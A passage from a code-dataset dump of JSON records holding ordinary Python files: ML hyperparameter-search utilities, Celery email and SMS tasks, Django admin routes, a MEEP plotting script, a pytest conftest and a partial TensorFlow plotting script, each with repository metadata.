"utils_data.format_unix", "line_number": 86, "usage_type": "call"}, {"api_name": "utils_data.get_unix", "line_number": 86, "usage_type": "call"}, {"api_name": "utils_data.format_unix", "line_number": 88, "usage_type": "call"}, {"api_name": "utils_data.get_unix", "line_number": 88, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout.Shape", "line_number": 109, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 109, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 109, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 123, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 123, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 145, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 145, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 167, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 167, "usage_type": "name"}, {"api_name": "plotly.graph_objects.layout.Shape", "line_number": 204, "usage_type": "call"}, {"api_name": "plotly.graph_objects.layout", "line_number": 204, "usage_type": "attribute"}, {"api_name": "plotly.graph_objects", "line_number": 204, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 220, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 220, "usage_type": "name"}, {"api_name": "numpy.subtract", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 244, "usage_type": "call"}]} +{"seq_id": "4733339105", "text": "import numpy as np\nfrom joblib import Parallel, delayed\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.preprocessing import OneHotEncoder\nfrom tqdm import tqdm\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint\nfrom sklearn.model_selection import RandomizedSearchCV, GridSearchCV, StratifiedKFold\nimport pandas as pd\nimport os\nimport tensorflow as tf\n\n\ndef append_confidence_score(data, labels):\n\n confidence_score = np.zeros(data.shape)\n confidence_score[:, :, 1:, :, :] = (data[:, :, 1:, :, :] - data[:, :, :-1, :, :])**2\n confidence_score = np.cumsum(confidence_score, axis=2)\n\n return np.concatenate([data, confidence_score], axis=1)\n\n\ndef interpolate_frames(data, labels):\n\n # interpolate and bring the data to the same length\n print(\"Interpolating frames\")\n\n for i in tqdm(range(data.shape[0])):\n length = labels.iloc[i]['length']\n data[i] = np.apply_along_axis(lambda x: np.interp(np.linspace(0, length, data.shape[2]), np.arange(length), x[:length]), 1, data[i]) \n \n return data\n\n\ndef randomized_search(model, param_grid, X, y, **kwargs):\n\n reduce_lr = ReduceLROnPlateau(monitor='loss', patience=50, factor=0.8, min_lr=0.000001)\n random_search = RandomizedSearchCV(estimator=model, param_distributions=param_grid, n_iter=100, n_jobs=8, cv=3, verbose=10)\n random_search.fit(X, y, callbacks=[reduce_lr], **kwargs)\n return random_search\n\n\ndef grid_search(model, param_grid, X, y, **kwargs):\n\n reduce_lr = ReduceLROnPlateau(monitor='loss', patience=50, verbose=1, factor=0.8, min_lr=0.000001)\n grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-2, cv=3, verbose=10) \n return grid.fit(X, y, callbacks=[reduce_lr], verbose=0, **kwargs)\n\n\ndef cross_validate(model, n_epochs, 
batch_size):\n\n skf = StratifiedKFold(n_splits=5)\n out = Parallel(n_jobs=5, verbose=100)(delayed(train)(model, train_index, test_index, epochs=n_epochs, batch_size=batch_size) for train_index, test_index in list(skf.split(X, y)))\n\n return out\n\n\ndef output_grid_search(build_model, param_grid):\n\n model = KerasClassifier(build_fn=build_model, verbose=1)\n search_result = grid_search(model, param_grid, X, y)\n\n print(\"Best: %f using %s\" % (search_result.best_score_, search_result.best_params_))\n\n params = search_result.cv_results_['params']\n mean_test_score = search_result.cv_results_['mean_test_score']\n std_test_score = search_result.cv_results_['std_test_score']\n\n for params, mean, std in zip(params, mean_test_score, std_test_score):\n print(\"%f (%f) with: %r\" % (mean, std, params))\n\n return search_result\n\n\ndef output_random_search(build_model, param_grid):\n\n model = KerasClassifier(build_fn=build_model, verbose=1)\n search_result = randomized_search(model, param_grid, X, y)\n\n print(\"Best: %f using %s\" % (search_result.best_score_, search_result.best_params_))\n means = search_result.cv_results_['mean_test_score']\n stds = search_result.cv_results_['std_test_score']\n params = search_result.cv_results_['params']\n\n for mean, stdev, param in sorted(zip(means, stds, params), key=lambda x: x[0])[::-1]:\n print(\"%f (%f) with: %r\" % (mean, stdev, param))\n\n return search_result\n\n\ndef load_data(labels, path_data, path_labels_df):\n\n print(\"Loading data (takes less than a minute)\")\n\n labels_df = pd.read_csv(path_labels_df)\n idx = labels_df.loc[labels_df['label'].astype(int).isin(labels)].index\n labels_df = labels_df.loc[idx]\n\n data = np.load(path_data).astype(np.float64)[idx]\n\n one_hot_encoder = OneHotEncoder(sparse=False)\n y = one_hot_encoder.fit_transform(labels_df.loc[idx, 'label'].to_numpy().reshape(-1, 1))\n\n return data, y\n", "repo_name": "RemyMess/MMVRC_ICCV_2021_Skeleton_based_Action_Recognition", "sub_path": "src/algos/logsigrnn/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3737, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.cumsum", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 19, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.apply_along_axis", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 29, "usage_type": "call"}, {"api_name": "keras.callbacks.ReduceLROnPlateau", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 37, "usage_type": "call"}, {"api_name": "keras.callbacks.ReduceLROnPlateau", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 45, "usage_type": "call"}, {"api_name": "sklearn.model_selection.StratifiedKFold", "line_number": 51, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 52, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 52, "usage_type": "call"}, {"api_name": "keras.wrappers.scikit_learn.KerasClassifier", "line_number": 59, "usage_type": "call"}, {"api_name": 
"keras.wrappers.scikit_learn.KerasClassifier", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 98, "usage_type": "attribute"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "72921568194", "text": "import os\nfrom celery import Celery\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\nfrom twilio.rest import Client\n\nCELERY_BROKER_URL = os.environ.get('CELERY_BROKER_URL'),\nCELERY_RESULT_BACKEND = os.environ.get('CELERY_RESULT_BACKEND')\nSENDGRID_API_KEY = os.environ.get('SENDGRID_API_KEY')\nTWILIO_ACCOUNT_SID = os.environ.get('TWILIO_ACCOUNT_SID')\nTWILIO_AUTH_TOKEN = os.environ.get('TWILIO_AUTH_TOKEN')\nTWILIO_PHONE_NUMBER = os.environ.get('TWILIO_PHONE_NUMBER')\n\ncelery = Celery('tasks', broker=CELERY_BROKER_URL, backend=CELERY_RESULT_BACKEND)\ntwilio_client = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)\n\n@celery.task(name=\"tasks.email\")\ndef send_email(email, subject, message):\n message = Mail(\n from_email=\"addr@example.com\",\n to_emails=email,\n subject=subject,\n html_content=f'{message}'\n )\n try:\n sg = SendGridAPIClient(SENDGRID_API_KEY)\n response = sg.send(message)\n return response.status_code\n except Exception as e:\n print(e)\n return \"Error sending email\"\n\n@celery.task(name=\"tasks.text_message\")\ndef send_text(number, message):\n text_message = twilio_client.messages.create(\n body=message,\n from_=f\"+{TWILIO_PHONE_NUMBER}\",\n to=number\n )\n return text_message.sid\n", "repo_name": "leepuppychow/address_book", "sub_path": "server/celery-queue/tasks.py", "file_name": "tasks.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 9, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 10, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 12, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 12, "usage_type": "attribute"}, {"api_name": "celery.Celery", "line_number": 14, "usage_type": "call"}, {"api_name": "twilio.rest.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "sendgrid.helpers.mail.Mail", "line_number": 19, "usage_type": "call"}, {"api_name": "sendgrid.SendGridAPIClient", "line_number": 26, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 17, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "28251479043", "text": "from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\nfrom .views import Login, Dashboard, NotificationView, UsersList, TransactionView, 
TermsAndConditionView, \\\n UpdateTermsAndCondition, SetAdminNotificationSetting, GetAdminNotificationSetting, SendNotification, \\\n UpdateContactUsView, UpdatePrivacyPolicyView, CreateCoinPlan, ListCoinPlan, UpdateCoinPlan, CoinPlanDetail, \\\n NotificationCount, ReadNotifications, UserDetail, CreateUser, BlockUnblockUser, UserDelete\n\napp_name = 'adminpanel'\n\nurlpatterns = [\n path('login/', Login.as_view(), name='login'),\n path('dashboard/', Dashboard.as_view(), name='dashboard'),\n path('notification/', NotificationView.as_view(), name='notification'),\n path('users-list/', UsersList.as_view(), name='users-list'),\n path('user-delete//', UserDelete.as_view(), name='user-delete'),\n path('block-unblock-user//', BlockUnblockUser.as_view(), name='block-unblock-user'),\n path('transaction/', TransactionView.as_view(), name='transaction'),\n path('terms-and-condition/', TermsAndConditionView.as_view(), name='terms-and-condition'),\n path('update-terms-and-condition//', UpdateTermsAndCondition.as_view(),\n name='update-terms-and-condition'),\n path('notification-setting/', SetAdminNotificationSetting.as_view(),\n name='notification-setting'),\n path('get-notification-setting/', GetAdminNotificationSetting.as_view(),\n name='get-notification-setting'),\n path('send-notification/', SendNotification.as_view(),\n name='send-notification'),\n path('update-contact-us//',\n UpdateContactUsView.as_view(), name='update-contact-us'),\n path('update-privacy-policy//',\n UpdatePrivacyPolicyView.as_view(), name='update-privacy-policy'),\n path('create-coin-plan/', CreateCoinPlan.as_view(), name='create-coin-plan'),\n path('coin-plan-list/', ListCoinPlan.as_view(), name='coin-plan-list'),\n path('update-coin-plan//', UpdateCoinPlan.as_view(), name='update-coin-plan'),\n path('coin-plan-detail//', CoinPlanDetail.as_view(), name='coin-plan-detail'),\n path('user-detail//', UserDetail.as_view(), name='user-detail'),\n path('notification-count/', NotificationCount.as_view(),\n name='notification-count'),\n path('read-notification/', ReadNotifications.as_view(),\n name='read-notification'),\n path('user-create/', CreateUser.as_view(), name='user-create')\n ] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n# if settings.DEBUG:\n# urlpatterns += static(settings.MEDIA_URL,\n# document_root=settings.MEDIA_ROOT)\n# urlpatterns += static(settings.STATIC_URL,\n# document_root=settings.STATIC_ROOT)\n", "repo_name": "choudharyamit26/Cipher", "sub_path": "adminpanel/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "views.Login.as_view", "line_number": 12, "usage_type": "call"}, {"api_name": "views.Login", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.Dashboard.as_view", "line_number": 13, "usage_type": "call"}, {"api_name": "views.Dashboard", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.NotificationView.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.NotificationView", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.UsersList.as_view", "line_number": 15, "usage_type": 
"call"}, {"api_name": "views.UsersList", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.UserDelete.as_view", "line_number": 16, "usage_type": "call"}, {"api_name": "views.UserDelete", "line_number": 16, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.BlockUnblockUser.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.BlockUnblockUser", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TransactionView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "views.TransactionView", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.TermsAndConditionView.as_view", "line_number": 19, "usage_type": "call"}, {"api_name": "views.TermsAndConditionView", "line_number": 19, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.UpdateTermsAndCondition.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "views.UpdateTermsAndCondition", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "views.SetAdminNotificationSetting.as_view", "line_number": 22, "usage_type": "call"}, {"api_name": "views.SetAdminNotificationSetting", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "views.GetAdminNotificationSetting.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "views.GetAdminNotificationSetting", "line_number": 24, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "views.SendNotification.as_view", "line_number": 26, "usage_type": "call"}, {"api_name": "views.SendNotification", "line_number": 26, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UpdateContactUsView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UpdateContactUsView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UpdatePrivacyPolicyView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UpdatePrivacyPolicyView", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "views.CreateCoinPlan.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": "views.CreateCoinPlan", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "views.ListCoinPlan.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "views.ListCoinPlan", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "views.UpdateCoinPlan.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "views.UpdateCoinPlan", "line_number": 34, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "views.CoinPlanDetail.as_view", "line_number": 35, "usage_type": "call"}, {"api_name": "views.CoinPlanDetail", "line_number": 35, 
"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "views.UserDetail.as_view", "line_number": 36, "usage_type": "call"}, {"api_name": "views.UserDetail", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "views.NotificationCount.as_view", "line_number": 37, "usage_type": "call"}, {"api_name": "views.NotificationCount", "line_number": 37, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "views.ReadNotifications.as_view", "line_number": 39, "usage_type": "call"}, {"api_name": "views.ReadNotifications", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "views.CreateUser.as_view", "line_number": 41, "usage_type": "call"}, {"api_name": "views.CreateUser", "line_number": 41, "usage_type": "name"}, {"api_name": "django.conf.urls.static.static", "line_number": 42, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "21991652803", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n \n#ff_homo = np.load(\"data_focus_efield_homo_meep_31456.npy\", allow_pickle=True)\n#ff_inhomo = np.load(\"data_focus_efield_inhomo_meep_31456.npy\", allow_pickle=True)\nff_homo = np.load(\"data_focus_efield_homo_beamed_meep_31456.npy\", allow_pickle=True)\nff_inhomo = np.load(\"data_focus_efield_inhomo_beamed_meep_31456.npy\", allow_pickle=True)\n\nsx = 800\nsy = 1000\npml_thicc = 20.0\nx_pos = np.linspace(0.0, sx / 2.0 - pml_thicc, 40)\n\npower_ratio = []\npower_slice = 100\n\nplt.figure()\n\nrunning_i = 0\n#for j in range(80, 120):\nfor j in range(40, 80):\n\n ts = [time_step / 10.0 for time_step in range(len(ff_homo[j]))] \n #plt.plot(ts, np.array(ff_homo[j]) / 0.1 + j, color=\"red\", alpha=0.5)\n ts = [time_step / 10.0 for time_step in range(len(ff_inhomo[j]))] \n #plt.plot(ts, np.array(ff_inhomo[j]) / 0.1 + j, color=\"blue\", alpha=0.5) \n #plt.show()\n\n fpulse_homo = np.array([ff_homo[j][time_step] if ts[time_step] < 140 + 2000 else 0.0 for time_step in range(len(ts))])\n fpulse_inhomo = np.array([ff_inhomo[j][time_step] if ts[time_step] < 320 + 2000 else 0.0 for time_step in range(len(ts))])\n #plt.plot(ts, np.array(fpulse_homo) / 0.01 + j, color=\"red\", alpha=0.5)\n #plt.plot(ts, np.array(fpulse_inhomo) / 0.01 + j, color=\"blue\", alpha=0.5)\n \n #plt.plot(np.array(ff_homo[j]) / 0.3 + j, color=\"red\", alpha=0.5)\n #plt.plot(np.array(ff_inhomo[j]) / 0.3 + j, color=\"blue\", alpha=0.5)\n \n ff_homo_rfft = np.fft.rfft(fpulse_homo) #ff_homo[j])\n ff_inhomo_rfft = np.fft.rfft(fpulse_inhomo) #ff_inhomo[j])\n\n freqs = np.fft.rfftfreq(len(ff_homo[j]), (ts[1]- ts[0]) / 3.33)\n \n #plt.plot(freqs, 10.0 * np.log10(np.abs(ff_homo_rfft)) + j, color=\"red\", alpha=0.5)\n #plt.plot(freqs, 10.0 * np.log10(np.abs(ff_inhomo_rfft)) + j, color=\"blue\", alpha=0.5)\n plt.plot(10.0 * np.log10(np.abs(ff_homo_rfft)) + j, color=\"red\", alpha=0.5)\n plt.plot(10.0 * np.log10(np.abs(ff_inhomo_rfft)) + j, color=\"blue\", alpha=0.5)\n\n power_ratio += [np.power(np.abs(ff_inhomo_rfft[power_slice]), 2.0) / np.power(np.abs(ff_homo_rfft[power_slice]), 2.0)]\n #power_ratio += 
[np.sum(np.power(fpulse_inhomo, 2.0)) / np.sum(np.power(fpulse_homo, 2.0))]\n print(power_ratio[-1])\n\n \nplt.figure()\nplt.title(\"Focusing Factor for Isotropic Source in MEEP (@\"+str(int(1000.0*freqs[power_slice]))+\"MHz) and in Ray Tracer\")\nplt.xlabel(\"Distance on Surface from Source [m]\")\nplt.ylabel(\"Focusing Factor: Inhomo. Ice Power / Homo. Ice Power\")\nplt.grid()\nplt.xlim(0.0, 350.0)\nplt.ylim(1.1, 1.4)\nplt.plot(np.flip(x_pos, 0), power_ratio, label=\"MEEP Result\")\nplt.legend()\nplt.show()\n", "repo_name": "dansmithphysics/focusing_study", "sub_path": "plot_meep_result.py", "file_name": "plot_meep_result.py", "file_ext": "py", "file_size_in_byte": 2669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.load", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.fft.rfft", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 37, "usage_type": "attribute"}, {"api_name": "numpy.fft.rfft", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.fft.rfftfreq", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 40, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.log10", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.flip", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}]} +{"seq_id": "20135948233", "text": "from subprocess import Popen, PIPE\nimport os.path\nimport sys\nimport os\n\nimport py.io\nimport py.path\n\nHERE = os.path.dirname(__file__)\n\n\ndef match_script(*args, input=None, encoding='utf-8'):\n command = (sys.executable, '-m', 'match')\n env = dict(os.environ)\n env['PYTHONPATH'] = HERE + ':' + env.get('PYTHONPATH', '')\n return call_subprocess(command, args, input, encoding, env)\n\ndef match_main(*args, input=None, encoding='utf-8'):\n import match\n return call_function(match.main, args, input, encoding)\n\ndef grep(*args, input=None, encoding='utf-8'):\n return call_subprocess('grep', args, input, encoding)\n\ndef pytest_addoption(parser):\n parser.addoption('--match-script', action='store_true',\n help=\"run the match module as a script (default)\")\n parser.addoption('--match-main', action='store_true',\n help=\"run match.main() in the same interpreter\")\n parser.addoption(\"--grep\", action=\"store_true\",\n help=\"run the tests against grep\")\n parser.addoption(\"--all\", action=\"store_true\",\n help=\"all of the above\")\n\ndef pytest_generate_tests(metafunc):\n if 'call' in metafunc.fixturenames:\n if metafunc.config.option.all:\n funcs = [grep, match_main, match_script]\n else:\n funcs = []\n if metafunc.config.option.match_script:\n funcs.append(match_script)\n if metafunc.config.option.match_main:\n funcs.append(match_main)\n if metafunc.config.option.grep:\n funcs.append(grep)\n if not funcs:\n funcs.append(match_script)\n ids = [f.__name__ for f in funcs]\n metafunc.parametrize(\"call\", funcs, ids=ids)\n\n\ndef call_subprocess(command, args, input=None, encoding='utf-8', env=None):\n \"\"\"Call command with the arguments in args. If the input keyword argument\n is given, send it to stdin. Return a (stdoutdata, stderrdata, returncode)\n tuple.\n\n \"\"\"\n if isinstance(command, str):\n command = (command, )\n command = command\n p = Popen(command + args, stdin=PIPE, stdout=PIPE, stderr=PIPE, env=env)\n if encoding and input is not None:\n input = input.encode(encoding)\n out, err = p.communicate(input)\n if encoding:\n out = out.decode(encoding)\n err = err.decode(encoding)\n return out, err, p.returncode\n\n\ndef call_function(func, args, input=None, encoding='utf-8'):\n \"\"\"Call func with the single argument args and capture stdout/err writes\n while it runs. Ignore SystemExit. If the input keyword argument is given,\n send it to stdin. 
Return a (stdoutdata, stderrdata, returncode) tuple.\n\n \"\"\"\n tmpdir = py.path.local.mkdtemp()\n in_path = tmpdir.join('in')\n out_path = tmpdir.join('out')\n err_path = tmpdir.join('err')\n\n if input:\n if encoding:\n in_path.write_binary(input.encode(encoding))\n else:\n in_path.write_binary(input)\n else:\n in_path.ensure()\n\n in_capture = py.io.FDCapture(0, in_path.open('rb'), patchsys=True)\n out_capture = py.io.FDCapture(1, out_path.open('wb+'), patchsys=True)\n err_capture = py.io.FDCapture(2, err_path.open('wb+'), patchsys=True)\n\n code = 0\n try:\n func(args)\n except SystemExit as e:\n code = e.code\n\n in_capture.done()\n out_capture.done()\n err_capture.done()\n\n out = out_path.read_binary()\n err = err_path.read_binary()\n if encoding:\n out = out.decode(encoding)\n err = err.decode(encoding)\n\n return out, err, code\n\n", "repo_name": "codebicycle/python-practice-lemon24", "sub_path": "conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 3535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.dirname", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "match.main", "line_number": 20, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 62, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 62, "usage_type": "name"}, {"api_name": "py.io.path.local.mkdtemp", "line_number": 78, "usage_type": "call"}, {"api_name": "py.io.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 78, "usage_type": "name"}, {"api_name": "py.io.io.FDCapture", "line_number": 91, "usage_type": "call"}, {"api_name": "py.io.io", "line_number": 91, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 91, "usage_type": "name"}, {"api_name": "py.io.io.FDCapture", "line_number": 92, "usage_type": "call"}, {"api_name": "py.io.io", "line_number": 92, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 92, "usage_type": "name"}, {"api_name": "py.io.io.FDCapture", "line_number": 93, "usage_type": "call"}, {"api_name": "py.io.io", "line_number": 93, "usage_type": "attribute"}, {"api_name": "py.io", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "29425424765", "text": "import tensorflow as tf\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n # Function to display the values\n def plot_image(i, predictions_array, true_label, img):\n true_label, img = true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n\n plt.imshow(img, cmap=plt.cm.binary)\n\n predicted_label = np.argmax(predictions_array)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100 * np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\n\n # Function to draw the value charts of the plot\n def plot_value_array(i, predictions_array, true_label):\n true_label = true_label[i]\n plt.grid(False)\n plt.xticks(range(10))\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n\n 